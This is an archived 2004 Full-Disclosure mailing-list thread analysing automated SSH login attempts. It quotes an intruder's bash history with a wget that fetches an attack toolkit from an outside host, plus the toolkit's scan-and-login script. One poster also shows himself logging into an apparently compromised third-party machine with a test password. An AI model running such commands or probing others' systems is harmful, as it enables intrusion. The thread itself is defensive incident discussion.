Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [Full-Disclosure] Re: Automated SSH login attempts?

from [Dagur Valberg Johannsson] Network Security [Permanent Link]
Subject: Re: [Full-Disclosure] Re: Automated SSH login attempts?
Date: Thu, 29 Jul 2004 22:42:50 +0200 
What I find interesting is that the file vuln.txt contained a list of
IP addresses that seem to have been exploited. I tryed to login to one
of them with user/pass test:test

dagur@rivendale ssh $ ssh 161.53.223.3 -l test
Password: 
Linux zagreb 2.4.26-grsec #1 SMP Thu Apr 15 17:27:27 CEST 2004 i686 GNU/Linux

Connection to 161.53.223.3 closed.

On Thu, 29 Jul 2004 18:38:15 +0200, Stefan Janecek
<stefan.janecek@jku.at> wrote:

Hmmm - I have also been getting those login attemps, but thought them to
be harmless. Maybe they are not *that* harmless, though... Today I
managed to get my hands on a machine that was originating such login
attempts. I must admit I am far from being a linux security expert, but
this is what I've found out up to now:

Whoever broke into the machine did not take any attempts to cover up his
tracks - this is what I found in /root/.bash_history:

------
id
uname -a
w
id
ls
wgte frauder.us/linux/ssh.tgz
wget frauder.us/linux/ssh.tgz
tar xzvf ssh.tgz
tar xvf ssh.tgz
ls
cd ssh
ls
../go.sh 195.178
ls
pico uniq.txt
vi uniq.txt
ls
rm -rf uniq.txt
../go.sh 167.205
ls
rm -rf uniq.txt  vuln.txt
../go.sh 202.148.20
../go.sh 212.92
../go.sh 195.197
../go.sh 147.32
../go.sh 213.168
../go.sh 134.176
../go.sh 195.83
------

um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
binaries:

go.sh:
-------
../ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > uniq.txt
../sshf
-------

* 'ss' apparently is some sort of portscanner
* 'sshf' connects to every IP in uniq.txt and tries to log in as user
'test' first, then as user 'guest' (according to tcpdump).

This does not seem to be a stupid brute force attack, as there is only
one login attempt per user. Could it be that the tool tries to exploit
some vulnerability in the sshd, and just tries to look harmless by using
'test' and 'guest' as usernames?

The compromised machine was running an old debian woody installation
which had not been upgraded for at least one year, the sshd version
string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'

As already mentioned, I am far from being an expert, but if I can assist
in further testing, then let me know. Please CC me, I am not subscribed
to the list.

cheers,
Stefan




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  RE: [Full-Disclosure] Automated SSH login attempts?, Todd Towles
Next by Date:  Re: [Full-Disclosure] Re: Automated SSH login attempts?, Ron DuFresne
Previous by Thread:  Re: [Full-Disclosure] Re: Automated SSH login attempts?, Ron DuFresne
Next by Thread:  Re: [Full-Disclosure] Re: Automated SSH login attempts?, andrewg
Indexes:  [Date] [Thread] [Top] [All Lists]